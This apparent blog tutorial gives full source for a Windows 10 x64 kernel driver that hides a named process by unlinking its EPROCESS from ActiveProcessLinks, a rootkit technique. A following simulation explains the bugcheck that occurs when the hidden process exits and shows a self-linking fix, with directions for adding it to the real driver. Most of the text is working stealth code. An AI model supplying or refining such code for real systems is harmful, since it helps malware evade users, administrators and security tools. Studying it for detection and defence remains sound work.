Understanding the principle
Flow: PsInitialSystemProcess (the System process's EPROCESS, used as the entry point into the ActiveProcessLinks list) -> walk the list comparing each process's image name -> unlink the matching EPROCESS from the list in ring 0, so that anything enumerating processes through that list no longer sees it. Source: https://www.toymoban.com/news/detail-568495.html
Driver-side code (ring 0)
#include <ntifs.h>

// Exported by ntoskrnl but not declared in the public headers, so declare it ourselves.
NTKERNELAPI PUCHAR NTAPI PsGetProcessImageFileName(PEPROCESS Process);

// Offset of EPROCESS.ActiveProcessLinks on the Windows 10 x64 build used here.
// The offset changes between builds; confirm it with `dt nt!_EPROCESS ActiveProcessLinks` in WinDbg.
#define ACTIVE_PROCESS_LINKS_OFFSET 0x448

// Name of the process to hide, as stored in EPROCESS.ImageFileName (at most 15 characters).
#define TARGET_PROCESS_NAME "123.exe"

VOID DriverUnload(PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    DbgPrint("Driver Exit \r\n");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = DriverUnload;

    // Start from the System process. It is the first process inserted into the list,
    // so its ActiveProcessLinks entry sits directly after the global list head.
    PLIST_ENTRY SystemEntry = (PLIST_ENTRY)((PUCHAR)PsInitialSystemProcess + ACTIVE_PROCESS_LINKS_OFFSET);
    PLIST_ENTRY Entry = SystemEntry;
    PUCHAR szProcessName = PsGetProcessImageFileName(PsInitialSystemProcess);
    BOOLEAN Found = FALSE;
    DbgPrint("szProcessName %s\n", szProcessName);

    // Walk the process list
    for (;;)
    {
        Entry = Entry->Flink;
        // The entry just before the System process is the global list head (PsActiveProcessHead).
        // It is not embedded in an EPROCESS, so reaching it means the whole list has been walked.
        if (Entry->Flink == SystemEntry)
        {
            break;
        }
        szProcessName = PsGetProcessImageFileName((PEPROCESS)((PUCHAR)Entry - ACTIVE_PROCESS_LINKS_OFFSET));
        DbgPrint("szProcessName %s\n", szProcessName);
        if (strcmp((const char*)szProcessName, TARGET_PROCESS_NAME) == 0)
        {
            Found = TRUE;
            break;
        }
    }

    if (!Found)
    {
        DbgPrint("Process %s not found\n", TARGET_PROCESS_NAME);
        return STATUS_SUCCESS;
    }

    // Hide the process: make its neighbours point past this entry.
    // The entry itself still points at its old neighbours, which is why terminating
    // the hidden process afterwards crashes the system (see the note under the screenshots).
    Entry->Flink->Blink = Entry->Blink;
    Entry->Blink->Flink = Entry->Flink;
    DbgPrint("Hidden process %s\n", TARGET_PROCESS_NAME);

    return STATUS_SUCCESS;
}
Test screenshots
Before loading the driver: [screenshot not reproduced]
After loading the driver: [screenshot not reproduced]
The process 123.exe is hidden.
Note: terminating the hidden process while it is unlinked this way causes a bluescreen.
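The bluescreen has a concrete cause. The hidden EPROCESS still carries its old Flink and Blink; when the process exits, the kernel removes it from ActiveProcessLinks a second time, and since Windows 8 that removal checks that the entry's neighbours point back at it and bugchecks (KERNEL_SECURITY_CHECK_FAILURE, 0x139) when they do not. The usual mitigation is to point the unlinked entry's Flink and Blink at itself after the unlink. The following user-mode C simulation is an added example, not code from the original post: it models ActiveProcessLinks with a toy EPROCESS and a constructed four-process list (the struct layout, process names and the CONTAINING_RECORD arithmetic standing in for the hard-coded 0x448 are assumptions), repeats the driver's lookup and unlink, then simulates process exit with a checked RemoveEntryList to show the plain unlink failing the check and the self-linked unlink passing it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* User-mode stand-in for the kernel's LIST_ENTRY. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink, *Blink;
} LIST_ENTRY, *PLIST_ENTRY;

/* Toy EPROCESS (constructed for this example): only the fields the technique touches. */
typedef struct _FAKE_EPROCESS {
    LIST_ENTRY ActiveProcessLinks;
    char       ImageFileName[16];   /* 15 chars + NUL, like EPROCESS.ImageFileName */
} FAKE_EPROCESS, *PFAKE_EPROCESS;

/* Portable form of the driver's "(PUCHAR)Entry - 0x448" arithmetic. */
#define CONTAINING_RECORD(addr, type, field) ((type *)((char *)(addr) - offsetof(type, field)))

static void InsertTailList(PLIST_ENTRY Head, PLIST_ENTRY Entry)
{
    PLIST_ENTRY Last = Head->Blink;
    Entry->Flink = Head;  Entry->Blink = Last;
    Last->Flink = Entry;  Head->Blink = Entry;
}

/* Mirrors the checked RemoveEntryList the kernel runs on process exit: neighbours that do not
   point back at the entry mean a corrupt list, which the kernel turns into bugcheck 0x139. */
static bool RemoveEntryListChecked(PLIST_ENTRY Entry)
{
    PLIST_ENTRY Flink = Entry->Flink, Blink = Entry->Blink;
    if (Flink->Blink != Entry || Blink->Flink != Entry) return false;  /* would bugcheck */
    Blink->Flink = Flink;
    Flink->Blink = Blink;
    return true;
}

/* What anything walking ActiveProcessLinks (e.g. NtQuerySystemInformation) would list. */
static int CountVisible(PLIST_ENTRY Head)
{
    int n = 0;
    for (PLIST_ENTRY e = Head->Flink; e != Head; e = e->Flink) n++;
    return n;
}

/* The driver's lookup: walk the list and compare ImageFileName. */
static PFAKE_EPROCESS FindProcessByName(PLIST_ENTRY Head, const char *Name)
{
    for (PLIST_ENTRY e = Head->Flink; e != Head; e = e->Flink) {
        PFAKE_EPROCESS p = CONTAINING_RECORD(e, FAKE_EPROCESS, ActiveProcessLinks);
        if (strcmp(p->ImageFileName, Name) == 0) return p;
    }
    return NULL;
}

/* The driver's unlink: the neighbours skip the entry, but the entry keeps its stale pointers. */
static void HideProcessNaive(PFAKE_EPROCESS p)
{
    PLIST_ENTRY e = &p->ActiveProcessLinks;
    e->Flink->Blink = e->Blink;
    e->Blink->Flink = e->Flink;
}

/* Same unlink, then point the entry at itself so a later RemoveEntryList is a harmless no-op. */
static void HideProcessSafe(PFAKE_EPROCESS p)
{
    HideProcessNaive(p);
    p->ActiveProcessLinks.Flink = p->ActiveProcessLinks.Blink = &p->ActiveProcessLinks;
}

static FAKE_EPROCESS g_Procs[4];   /* constructed sample: System, smss.exe, 123.exe, explorer.exe */
static LIST_ENTRY    g_Head;

/* Rebuild the sample list and hide Target (self-linked or not); NULL if Target is absent. */
static PFAKE_EPROCESS BuildListAndHide(bool SelfLink, const char *Target)
{
    static const char *names[] = { "System", "smss.exe", "123.exe", "explorer.exe" };
    g_Head.Flink = g_Head.Blink = &g_Head;
    for (int i = 0; i < 4; i++) {
        snprintf(g_Procs[i].ImageFileName, sizeof g_Procs[i].ImageFileName, "%s", names[i]);
        InsertTailList(&g_Head, &g_Procs[i].ActiveProcessLinks);
    }
    PFAKE_EPROCESS p = FindProcessByName(&g_Head, Target);
    if (p != NULL) { if (SelfLink) HideProcessSafe(p); else HideProcessNaive(p); }
    return p;
}

/* Hide Target, then simulate its exit: 1 = removal check passes, 0 = would bugcheck, -1 = absent. */
static int ExitIsSafeAfterHide(bool SelfLink, const char *Target)
{
    PFAKE_EPROCESS p = BuildListAndHide(SelfLink, Target);
    return p ? (RemoveEntryListChecked(&p->ActiveProcessLinks) ? 1 : 0) : -1;
}

int main(void)
{
    BuildListAndHide(false, "123.exe");
    printf("plain unlink:       visible=%d exit safe=%d\n", CountVisible(&g_Head), ExitIsSafeAfterHide(false, "123.exe"));
    BuildListAndHide(true, "123.exe");
    printf("self-linked unlink: visible=%d exit safe=%d\n", CountVisible(&g_Head), ExitIsSafeAfterHide(true, "123.exe"));
    return 0;
}
```

Both variants hide 123.exe from a list walker (three processes remain visible), but only the self-linked one survives the process's exit. In the real driver the two self-link assignments go directly after the two unlink lines. The simulation models only the list-consistency check; it does not model the lock the kernel holds while modifying this list, which the driver above also does not acquire.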
This concludes the article "Windows 10 x64 driver: hiding an arbitrary process from a driver (part 4)".